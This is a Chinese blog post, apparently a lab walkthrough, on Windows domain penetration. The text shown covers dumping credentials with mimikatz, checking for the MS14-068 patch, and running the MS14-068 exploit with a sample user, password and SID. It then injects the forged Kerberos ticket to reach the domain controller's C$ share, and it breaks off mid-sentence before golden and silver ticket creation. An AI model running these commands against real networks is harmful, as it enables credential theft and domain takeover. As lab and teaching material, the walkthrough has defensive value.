域渗透--金银票据问题

本文详细介绍了域渗透过程,包括使用金票据和银票据提升域内用户权限的方法。首先,通过伪造凭据提升普通用户权限,然后利用MS14-068漏洞进行权限提升。接着,展示了如何使用mimikatz获取krbtgt的NTLM Hash和SID,生成金票和银票,并解释了它们的工作原理及区别。金票能伪造TGT,提供任意Kerberos访问权限,而银票伪造ST,仅能访问特定服务。
摘要由CSDN通过智能技术生成

金票据

  • 伪造凭据,提升域内普通用户权限

以admin用户登入任意一台域内主机

 

收集域信息

命令有:net config workstation,可以看到域名为:cyberpeace。

              nltest /dsgetdc:域名,可以看到域控主机名为:scene。

 

 

以admin权限运行mimikztz

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit">log.txt

找到域内一个用户和对应密码

 

 

使用该域用户登入域内

执行:dir \scene.cyberpeace.com\c$,尝试列出域控目录,提醒权限不够

尝试利用MS14-068来将用户的权限提升到域管权限

 

检查是否有提权漏洞,其补丁为 3011780,我们执行命令: systeminfo |find "3011780",如果返回为空就说明没有打补丁,存在MS14-068漏洞。

 

 

MS14-068漏洞利用方法:

MS14-068.exe -u 域成员名@域名 -p 域成员密码 -s 域成员sid -d 域控制器地址

 

 

目前我们已经知道域成员devuser和其密码,域控制器地址scene.cyberpeace.com,还需要知道的是devuser的SID值。

 

通过Whoami /all或者whoami /user,查看devuser用户的suid:

 

 

 

执行命令:

C:\MS14-068>MS14-068.exe -u devuser@cyberpeace.com -p HOTdev123456 -s S-1-5-21-97341123-1865264218-933115267-1108 -d scene.cyberpeace.com


命令执行成功后会在当前目录下生成一个凭证。

 

再使用mimikatz清空之前缓存的凭证,导入伪造的凭证:mimikatz # kerberos::purge  //清空票据mimikatz # kerberos::ptc 凭证文件地址

此刻再输入:

dir \\scene.cyberpeace.com\c$,发现访问成功,现在我们

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值